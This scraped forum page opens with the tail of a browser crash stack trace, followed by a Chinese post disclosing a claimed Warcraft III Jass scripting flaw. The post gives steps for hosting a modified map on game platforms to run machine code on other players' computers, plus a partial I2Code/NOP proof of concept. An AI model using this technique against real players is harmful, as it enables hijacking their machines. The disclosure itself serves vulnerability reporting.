f4 0000004d`44830d70 00007ffe`83c9c546 chakra!MemProtectHeapUnrootAndZero+0x2648c
f5 0000004d`44830e60 00007ffe`83cde729 chakra!MemProtectHeapUnrootAndZero+0x25a56
f6 0000004d`44830ed0 00007ffe`83ca29e1 chakra!JsVarToExtension+0xa3e9
f7 0000004d`44830f70 00007ffe`83c9e59c chakra!MemProtectHeapUnrootAndZero+0x2bef1
f8 0000004d`44831000 00007ffe`84650c4d chakra!MemProtectHeapUnrootAndZero+0x27aac
f9 0000004d`448310a0 00007ffe`84650b98 edgehtml!Ordinal107+0x77add
fa 0000004d`448310f0 00007ffe`8458ac07 edgehtml!Ordinal107+0x77a28
fb 0000004d`44831130 00007ffe`8458a9f7 edgehtml!CreateWebDriverAdapter+0xedc7
fc 0000004d`448312b0 00007ffe`8464f59a edgehtml!CreateWebDriverAdapter+0xebb7
fd 0000004d`44831330 00007ffe`844b61e4 edgehtml!Ordinal107+0x7642a
fe 0000004d`44831490 00007ffe`845a0e21 edgehtml!Ordinal105+0xd2b4
ff 0000004d`448314d0 00007ffe`8505d046 edgehtml!CreateWebDriverAdapter+0x24fe1
-->



















公告:https://www.sitedirsec.com公布最新漏洞,请关注

TOP

游戏高危漏洞(魔兽争霸、反恐精英)
[/quote]
[quote]War3 Jass虚拟机经测试,存在严重漏洞!允许运行时动态创建并执行任意机器码 Jass属于War3为地图开发者提供的一套脚本语言,方便开发者开发或建立修改属于自己的地图。经过推断,CS (cstrike)可能也存在此类问题。
利用方式:登陆浩方或者VS对战平台,修改某张地图(例如DOTA的地图),开启游戏,等待其他玩家进入,开始游戏,即可执行任意机器码,控制玩家计算机。
Jass语言的用处Jass(正确地说是Jass2)是魔兽3的脚本语言, 用于控制地图的进程和行为, 是魔兽游戏和地图的基础. 正常的地图编辑中摆放的单位(Unit), 设置的触发(Trigger)等最终都会被翻译成Jass语言存在地图文件里在游戏时被调用.
POC:
set bj_meleeTwinkedHeroes[1024] = 0x90909090set bj_meleeTwinkedHeroes[1025] = 0x90909090 //and other bytecode giberish....
local code C = I2Code( code2I(function GetRandomDirectionDeg) + 0xC92D8 )
call TriggerAddAction(t, C)call TriggerExecute(t)
//It will run whatever bytecode 90 90 90 90 means
function main takes nothing returns nothingset t = CreateTrigger()call TriggerAddAction(t, i2code(0x00929217) )a[0]=0x45623512a[1]=0x34562323a[2]=0x62329301...//other thousand lines of this...b[0]=0x12312333endfunction


















公告:https://www.sitedirsec.com公布最新漏洞,请关注

TOP

返回列表